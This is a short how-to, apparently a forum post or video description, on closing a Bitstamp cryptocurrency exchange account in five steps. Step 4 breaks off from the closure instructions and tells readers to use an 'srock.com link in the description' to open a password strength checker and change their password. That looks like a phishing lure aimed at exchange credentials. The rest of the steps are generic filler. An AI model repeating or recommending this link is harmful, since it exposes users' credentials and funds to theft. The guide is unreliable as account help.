I hit this issue today and here's the quick fix that solved it. If you are looking to close your Bitstamp account, follow these straightforward steps. Step 1. Log into your account. Start by logging into your Bitstamp account using your credentials. Make sure you have access to the email associated with your account for verification purposes. Step 2. Navigate to Account Settings. Once logged in, go to the Account Settings section. This is usually found in the upper right corner of the screen under your profile icon. Step 3. Find the Account Closure option. In the Account Settings menu, look for the option related to account closure or deletion. It might be labeled as Close Account or something similar. Step 4. Follow the closure instructions. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Note, if you have pending transactions or an open balance, you may need to resolve those before proceeding. Step 5. Confirm account closure. After completing the necessary steps, confirm that you want to close your account. You should receive a confirmation email once the process is complete. Closing your Bitstamp account is a simple process if you follow these steps. If you have any lingering questions, don't hesitate to reach out to customer support. Happy trading!